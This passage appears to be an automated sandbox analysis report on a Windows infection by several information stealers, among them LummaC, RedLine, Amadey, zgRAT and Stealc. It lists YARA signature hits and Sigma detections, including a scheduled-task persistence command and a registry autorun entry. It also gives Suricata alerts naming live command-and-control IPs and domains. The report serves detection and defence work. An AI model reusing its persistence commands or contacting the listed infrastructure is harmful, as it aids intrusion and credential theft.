24.2.PureSyncInst.exe.1d10000.2.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
44.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
21.2.caesium-image-compressor.exe.1c30000.2.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
24.2.PureSyncInst.exe.1ccc000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
24.3.PureSyncInst.exe.1d10000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
24.3.PureSyncInst.exe.1d10000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
7.2.crypted.exe.3fc5570.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
24.2.PureSyncInst.exe.1d10000.2.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
12.2.RegAsm.exe.436060.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
22.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
19.2.Hkbsse.exe.520000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
18.0.Hkbsse.exe.520000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
37.2.Amadeus.exe.e20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
45.2.Hkbsse.exe.520000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
12.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
37.0.Amadeus.exe.e20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
12.2.RegAsm.exe.482060.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
12.2.RegAsm.exe.482060.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegAsm.exe.482060.1.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45693:$s1: file:/// 0x455ef:$s2: {11111-22222-10009-11112} 0x45623:$s3: {11111-22222-50001-00000} 0x4264e:$s4: get_Module 0x3cd3c:$s5: Reverse 0x3da37:$s6: BlockCopy 0x3cd0a:$s7: ReadByte 0x456a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
13.0.pLAZbVgk7u.exe.1c0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
13.0.pLAZbVgk7u.exe.1c0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.0.pLAZbVgk7u.exe.1c0000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45693:$s1: file:/// 0x455ef:$s2: {11111-22222-10009-11112} 0x45623:$s3: {11111-22222-50001-00000} 0x4264e:$s4: get_Module 0x3cd3c:$s5: Reverse 0x3da37:$s6: BlockCopy 0x3cd0a:$s7: ReadByte 0x456a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
12.2.RegAsm.exe.482060.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
12.2.RegAsm.exe.482060.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegAsm.exe.482060.1.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x43893:$s1: file:/// 0x437ef:$s2: {11111-22222-10009-11112} 0x43823:$s3: {11111-22222-50001-00000} 0x4084e:$s4: get_Module 0x3af3c:$s5: Reverse 0x3bc37:$s6: BlockCopy 0x3af0a:$s7: ReadByte 0x438a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
17.0.Nework.exe.1f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.OmnqazpM3P.exe.7b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.2.crypted.exe.3fc5570.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.RegAsm.exe.436060.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
24.2.PureSyncInst.exe.1ccc000.1.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
45.0.Hkbsse.exe.520000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.2.caesium-image-compressor.exe.1c30000.2.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
3.2.axplong.exe.170000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.2.caesium-image-compressor.exe.1be4000.3.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
24.3.PureSyncInst.exe.1ccc000.1.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
22.2.BitLockerToGo.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
44.2.BitLockerToGo.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
21.2.caesium-image-compressor.exe.1be4000.3.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
46.0.Amadeus.exe.e20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
15.0.6rxotqIg7H.exe.ce0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.Nework.exe.1f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
46.2.Amadeus.exe.e20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
24.3.PureSyncInst.exe.1ccc000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
18.2.Hkbsse.exe.520000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
19.0.Hkbsse.exe.520000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.axplong.exe.170000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.axplong.exe.170000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
12.2.RegAsm.exe.400000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
12.2.RegAsm.exe.400000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xc48f3:$s1: file:/// 0xc484f:$s2: {11111-22222-10009-11112} 0xc4883:$s3: {11111-22222-50001-00000} 0xc18ae:$s4: get_Module 0x52fe2:$s5: Reverse 0xbbf9c:$s5: Reverse 0xbcc97:$s6: BlockCopy 0xbbf6a:$s7: ReadByte 0xc4905:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 47 entries

Sigma Signatures

System Summary

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 5828, StartAddress: 4F3CBCC0, TargetImage: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, TargetProcessId: 5828

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7124, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, ProcessId: 3996, ProcessName: schtasks.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", ProcessId: 5828, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\1000238002\Amadeus.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 6664, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Amadeus.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Shipment.pif E, CommandLine: Shipment.pif E, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5336, ParentProcessName: cmd.exe, ProcessCommandLine: Shipment.pif E, ProcessId: 3920, ProcessName: Shipment.pif

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, ProcessId: 3920, TargetFilename: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, ProcessId: 3920, TargetFilename: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", ProcessId: 5828, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 2944, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url

Suricata Signatures

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:22.067692+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:07.049102+0200
SID:	2803305
Severity:	3
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-08-31T15:45:00.879634+0200
SID:	2055477
Severity:	1
Source Port:	61294
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:13.484903+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity M2 - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:45:09.476110+0200
SID:	2049812
Severity:	1
Source Port:	49769
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:45:09.476110+0200
SID:	2054653
Severity:	1
Source Port:	49769
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:19.892744+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 65.21.18.51 - Destination IP: 192.168.2.5

Timestamp:	2024-08-31T15:44:11.876188+0200
SID:	2043234
Severity:	1
Source Port:	45580
Destination Port:	49721
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:17.259592+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:19.150122+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:13.771836+0200
SID:	2803305
Severity:	3
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 52.212.52.84

Timestamp:	2024-08-31T15:44:16.304102+0200
SID:	2803305
Severity:	3
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:20.314267+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:44:35.529672+0200
SID:	2055493
Severity:	1
Source Port:	49735
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 95.179.250.45 - Destination IP: 192.168.2.5

Timestamp:	2024-08-31T15:44:13.815893+0200
SID:	2046056
Severity:	1
Source Port:	26212
Destination Port:	49715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:14.481498+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:18.419367+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:09.653335+0200
SID:	2044696
Severity:	1
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T15:45:01.487822+0200
SID:	2055489
Severity:	1
Source Port:	49755
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:54.795044+0200
SID:	2044696
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:18.682229+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.19 - Destination IP: 192.168.2.5

Timestamp:	2024-08-31T15:44:56.783797+0200
SID:	2856122
Severity:	1
Source Port:	80
Destination Port:	49744
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:16.922485+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 185.215.113.17

Timestamp:	2024-08-31T15:44:16.242885+0200
SID:	2044243
Severity:	1
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:15.662378+0200
SID:	2044696
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 52.212.52.84

Timestamp:	2024-08-31T15:44:38.980248+0200
SID:	2803305
Severity:	3
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:21.352988+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 69.57.172.44

Timestamp:	2024-08-31T15:44:37.577906+0200
SID:	2803305
Severity:	3
Source Port:	49737
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:13.528781+0200
SID:	2044696
Severity:	1
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config - Source IP: 185.215.113.17 - Destination IP: 192.168.2.5

Timestamp:	2024-08-31T15:44:16.512993+0200
SID:	2044245
Severity:	1
Source Port:	80
Destination Port:	49724
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 52.212.52.84

Timestamp:	2024-08-31T15:44:34.922409+0200
SID:	2803305
Severity:	3
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T15:45:02.618563+0200
SID:	2049836
Severity:	1
Source Port:	49755
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T15:45:02.618563+0200
SID:	2054653
Severity:	1
Source Port:	49755
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:14.686467+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:17.924004+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:04.047738+0200
SID:	2856147
Severity:	1
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:17.681043+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 65.21.18.51 - Destination IP: 192.168.2.5

Timestamp:	2024-08-31T15:44:17.267791+0200
SID:	2046056
Severity:	1
Source Port:	45580
Destination Port:	49721
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T15:45:13.662321+0200
SID:	2044597
Severity:	1
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:17.415469+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:52.097936+0200
SID:	2044696
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:15.882815+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:20.085498+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:18.131625+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:45:08.961542+0200
SID:	2055493
Severity:	1
Source Port:	49769
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 95.179.250.45 - Destination IP: 192.168.2.5

Timestamp:	2024-08-31T15:44:08.437429+0200
SID:	2043234
Severity:	1
Source Port:	26212
Destination Port:	49715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-08-31T15:44:34.124673+0200
SID:	2055479
Severity:	1
Source Port:	55125
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:45:03.117048+0200
SID:	2055493
Severity:	1
Source Port:	49760
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:19.463266+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:20.124433+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.26

Timestamp:	2024-08-31T15:44:10.961103+0200
SID:	2803305
Severity:	3
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 185.215.113.17 - Destination IP: 192.168.2.5

Timestamp:	2024-08-31T15:44:17.340391+0200
SID:	2044247
Severity:	1
Source Port:	80
Destination Port:	49724
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T15:44:34.609653+0200
SID:	2055489
Severity:	1
Source Port:	49733
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.17

Timestamp:	2024-08-31T15:44:35.404954+0200
SID:	2803304
Severity:	3
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:15.695580+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:14.192726+0200
SID:	2043231
Severity:	1
Source Port:	49715
